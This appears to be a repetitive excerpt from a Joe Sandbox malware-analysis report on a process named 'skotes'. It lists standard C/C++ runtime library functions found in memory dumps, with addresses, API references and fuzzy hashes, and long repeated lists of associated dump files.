Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: 91fc2c78b9c6b62c0bc3a12f8d9da9d95713c0d5042b39d0f0702e7b0e391bab
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: 5601D632600514E7CF16EE548845BFF77A99F85750F100115FC16AB282DA79EE4097A0

Function 007A9510 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 007A9519

Part of subcall function 0079F4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 007A5486

Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 007A953D
Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 007A9550
Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 007A9559

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
String ID:
API String ID: 218105897-0
Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
Instruction ID: 72fa470b4b339bd6b422e76feea455837b562c6685b98e76c20cd77aa7fbaa56
Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
Instruction Fuzzy Hash: EAF0A730A00A109EEA62AB588816FAB23959FC6711F00C61DE51BD71C2CE2CE852CB81

Function 007BFCC0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 322COMMONLIBRARYCODE

Download Yara Rule

APIs

__fassign.LIBCMT ref: 007BFEE7
__fassign.LIBCMT ref: 007BFF04

Strings

=L-t, xrefs: 007BFCCB

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: __fassign
String ID: =L-t
API String ID: 3965848254-768041998
Opcode ID: a74f778afeab8b57a970de5bac8ba6fd87340af4c551b8f913b2fc6367d58e57
Instruction ID: 6a989129e5e394c1575c7ed54ad1e8801b99ac7a2f7168339d3355ae18e9d615
Opcode Fuzzy Hash: a74f778afeab8b57a970de5bac8ba6fd87340af4c551b8f913b2fc6367d58e57
Instruction Fuzzy Hash: 31C1AE71D01258DFCF15CFE8C880AEDBBB5AF49314F28416EE855BB242D634AE46CB94

Function 007826B0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 207COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00782846
___std_exception_destroy.LIBVCRUNTIME ref: 007828E0

Strings

=L-t, xrefs: 007826D8

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: =L-t
API String ID: 2970364248-768041998
Opcode ID: 35891320b5b4a4f5207daf58f13488717f1d6139c83b2c6bf8b070b4bac74a31
Instruction ID: 0cd8a238a0912ee971eccd2c28349bf04c19f32c83ac3058fc4023c917c69903
Opcode Fuzzy Hash: 35891320b5b4a4f5207daf58f13488717f1d6139c83b2c6bf8b070b4bac74a31
Instruction Fuzzy Hash: A9718071A00248DBDF04DFA8D885BDDFBB5EF59310F14812DE815A7382E778A944CBA5

Function 0078DBE0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 189COMMON

Download Yara Rule

Strings

=L-t, xrefs: 0078DBE6, 0078DD2F
list too long, xrefs: 0078E09D

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: =L-t$list too long
API String ID: 0-635664661
Opcode ID: 676243dc09987dba4dd6275009843f0ebad0cd55077631faa469b1452b25e887
Instruction ID: 2980a4545479c0a7a1f86396c706c34f88b15dfb2849fc72897da5c25351f9d7
Opcode Fuzzy Hash: 676243dc09987dba4dd6275009843f0ebad0cd55077631faa469b1452b25e887
Instruction Fuzzy Hash: 3261A3B0944758DBDF20DF64DD89B99B7B4FF08700F1045AAE80CAB281EB78AA51CF51

Function 00783040 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 007830F5
__Mtx_unlock.LIBCPMT ref: 0078319B

Strings

=L-t, xrefs: 00783054

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID: =L-t
API String ID: 1418687624-768041998
Opcode ID: fea8a575edae4e04dc49a87e06a22581c655df1db04cc4a376d7f3da554dd8d3
Instruction ID: 4fdafd82beda96fa2ff82269672a23b2f807015c162567546498aa1277b4258d
Opcode Fuzzy Hash: fea8a575edae4e04dc49a87e06a22581c655df1db04cc4a376d7f3da554dd8d3
Instruction Fuzzy Hash: 7741F170E41609DFEF11EFA8D9487AABBA9FF15B10F048169E80597242E739DB04C7E1

Function 00797A00 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMONLIBRARYCODE

Download Yara Rule

APIs

__Cnd_destroy_in_situ.LIBCPMT ref: 00797AF8
__Mtx_destroy_in_situ.LIBCPMT ref: 00797B01

Strings

d+~, xrefs: 00797A94, 00797AA2, 00797A9A

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
